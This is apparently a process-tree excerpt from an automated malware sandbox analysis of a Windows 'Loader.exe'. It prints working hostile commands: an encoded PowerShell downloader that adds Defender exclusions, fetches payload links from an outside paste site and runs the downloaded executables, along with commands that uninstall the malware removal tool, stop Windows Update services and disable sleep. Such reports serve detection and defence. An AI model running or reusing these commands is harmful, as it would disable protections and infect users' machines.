IAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\adebj4ig.t3j2.exe"C:\Users\Admin\AppData\Roaming\adebj4ig.t3j2.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\adebj4ig.t3j3.exe"C:\Users\Admin\AppData\Roaming\adebj4ig.t3j3.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\avfexwas.ea22.exe"C:\Users\Admin\AppData\Roaming\avfexwas.ea22.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\avfexwas.ea23.exe"C:\Users\Admin\AppData\Roaming\avfexwas.ea23.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u2.exe"C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u2.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u3.exe"C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u3.exe"4⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf2.exe"C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf2.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf3.exe"C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf3.exe"4⤵
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi22.exe"C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi22.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi23.exe"C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi23.exe"4⤵
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Roaming\untr5i5u.otm2.exe"C:\Users\Admin\AppData\Roaming\untr5i5u.otm2.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\untr5i5u.otm3.exe"C:\Users\Admin\AppData\Roaming\untr5i5u.otm3.exe"4⤵
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl2.exe"C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl2.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl3.exe"C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl3.exe"4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b0,0x7ffa2d402e98,0x7ffa2d402ea4,0x7ffa2d402eb02⤵
-
